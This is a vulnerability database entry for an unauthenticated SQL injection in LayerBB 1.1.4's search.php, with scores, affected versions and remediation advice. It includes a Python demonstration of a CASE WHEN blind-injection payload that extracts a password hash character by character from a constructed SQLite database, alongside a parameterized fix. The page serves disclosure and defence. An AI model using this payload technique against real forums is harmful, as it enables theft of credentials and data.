Description
LayerBB 1.1.4 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the search_query parameter. Attackers can send POST requests to /search.php with malicious search_query values using CASE WHEN statements to extract sensitive database information.
Published: 2026-05-16
Score: 8.8 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

LayerBB 1.1.4 contains an SQL injection flaw that lets unauthenticated attackers alter database queries through the search_query parameter of a POST request to /search.php. Because the parameter reaches the query without proper sanitization, an attacker can embed CASE WHEN expressions that make the search result depend on a condition of their choosing; the presence or absence of results then serves as a yes/no oracle for reading data from other tables, typically one character at a time. The weakness is an input validation failure classified as CWE-89. The published CVSS vectors rate confidentiality impact high and integrity impact low, so the direct consequence is disclosure of database contents rather than arbitrary modification, with any further attack progression depending on what the exposed data can be reused for.

Affected Systems

The vulnerability is reported against LayerBB 1.1.4. The CPE entries also list versions 1.0.4 through 1.1.3, so earlier releases in the 1.0.x and 1.1.x series should be treated as affected, but the description confirms the behaviour only against 1.1.4.

Risk and Exploitability

The CVSS v4.0 base score is 8.8 (CVSS v3.1: 8.2), high severity under both schemes. No EPSS score is available, and the vulnerability is not in the CISA KEV catalog, which means CISA has not recorded confirmed exploitation, not that exploitation is unlikely. The attack needs no authentication, no user interaction and nothing beyond an HTTP POST to /search.php, so anyone who can reach the application can read database contents through the CASE WHEN inference described above. Both vectors rate integrity impact low and availability impact none, so the direct outcome is data disclosure; whether that escalates to wider compromise depends on what the disclosed data (for example credential material) can be reused for.

Generated by OpenCVE AI on May 16, 2026 at 16:53 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Check for an official LayerBB update that repairs the search_query sanitization and apply it as soon as it becomes available.
  • If no update exists, revise the search.php logic to enforce strict validation or use parameterized queries so that any user‑supplied input cannot alter the SQL command structure.
  • Deploy a web application firewall rule that inspects POST requests to /search.php for SQL injection patterns such as CASE WHEN or UNION. Treat this as a stopgap only: keyword blocklists are routinely bypassed with comments, encoding and case variation, and they also block legitimate searches that happen to contain those words, so the real fix remains parameterized queries in search.php.
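The mechanics behind the CASE WHEN inference described in the analysis and the parameterized-query fix in the second recommendation, as an added example that is not LayerBB's code: a constructed in-memory SQLite stand-in for the forum database (the table and column names, the admin row and its hash value are all assumptions; the advisory gives no schema), a search function that splices search_query into the SQL text the way the advisory describes, a CASE WHEN payload that turns the result count into a true/false oracle and recovers a value from another table one character at a time, and the parameterized form that makes the same payload inert.

```python
import sqlite3

HEX = "0123456789abcdef"


def make_db():
    """Constructed in-memory stand-in for the forum database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE posts (id INTEGER PRIMARY KEY, subject TEXT, body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO posts VALUES (1, 'welcome', 'first post'), (2, 'rules', 'be nice');
        INSERT INTO users VALUES (1, 'admin', 'ab12cd');  -- assumed secret value
        """
    )
    return conn


def search_vulnerable(conn, search_query):
    """Bug class from the advisory: the parameter is spliced into the SQL text."""
    sql = "SELECT id, subject FROM posts WHERE subject LIKE '%" + search_query + "%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, search_query):
    """Parameterized form: the value travels separately from the statement,
    so it can never change the statement's structure."""
    sql = "SELECT id, subject FROM posts WHERE subject LIKE '%' || ? || '%'"
    return conn.execute(sql, (search_query,)).fetchall()


def oracle_payload(position, guess):
    """CASE WHEN payload: the search returns rows only if the guess is right.

    Closing the LIKE literal with %' keeps the original clause syntactically
    valid and matching every row, so the CASE WHEN subquery alone decides
    whether rows come back. The trailing -- comments out the leftover %'.
    """
    return (
        "%' AND (SELECT CASE WHEN substr(password_hash,{},1)='{}' THEN 1 ELSE 0 END "
        "FROM users WHERE username='admin')=1 -- ".format(position, guess)
    )


def extract_hash(conn, length, alphabet=HEX):
    """Recover the admin hash one character at a time via the boolean oracle."""
    recovered = ""
    for position in range(1, length + 1):
        for guess in alphabet:
            if search_vulnerable(conn, oracle_payload(position, guess)):
                recovered += guess
                break
        else:
            break  # no guess matched: value is shorter or uses other characters
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal search:", search_vulnerable(db, "wel"))
    print("leaked via CASE WHEN oracle:", extract_hash(db, 6))
    print("fixed, same payload:", search_fixed(db, oracle_payload(1, "a")))
    print("fixed, normal search:", search_fixed(db, "wel"))
```

Against the vulnerable function the oracle recovers the assumed hash in at most sixteen requests per character, which is why a WAF keyword filter is only a delay: every request is a plain search. Against the parameterized function the same payload is just a string that no subject contains. Note that parameterization stops injection but does not neutralize LIKE wildcards (`%`, `_`) supplied by the user; escaping those is a separate search-semantics decision, not a security fix.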

Advisories

No advisories yet.

History

Sat, 16 May 2026 15:45:00 +0000

Values Added (Values Removed column empty):

Description: LayerBB 1.1.4 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the search_query parameter. Attackers can send POST requests to /search.php with malicious search_query values using CASE WHEN statements to extract sensitive database information.
Title: LayerBB 1.1.4 SQL Injection via search_query Parameter
First Time appeared: Layerbb, Layerbb layerbb
Weaknesses: CWE-89
CPEs:
  cpe:2.3:a:layerbb:layerbb:1.0.4:*:*:*:*:*:*:*
  cpe:2.3:a:layerbb:layerbb:1.0.5:*:*:*:*:*:*:*
  cpe:2.3:a:layerbb:layerbb:1.0.6:*:*:*:*:*:*:*
  cpe:2.3:a:layerbb:layerbb:1.1.0:*:*:*:*:*:*:*
  cpe:2.3:a:layerbb:layerbb:1.1.1:*:*:*:*:*:*:*
  cpe:2.3:a:layerbb:layerbb:1.1.2:*:*:*:*:*:*:*
  cpe:2.3:a:layerbb:layerbb:1.1.3:*:*:*:*:*:*:*
  cpe:2.3:a:layerbb:layerbb:1.1.4:*:*:*:*:*:*:*
Vendors & Products: Layerbb, Layerbb layerbb
References: (none)
Metrics:
  cvssV3_1: {'score': 8.2, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N'}
  cvssV4_0: {'score': 8.8, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-05-16T15:26:06.961Z

Reserved: 2026-02-01T11:24:18.720Z

Link: CVE-2021-47954

Vulnrichment

No data.

NVD

Status: Received

Published: 2026-05-16T16:16:21.650

Modified: 2026-05-16T16:16:21.650

Link: CVE-2021-47954

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-16T17:00:13Z

Weaknesses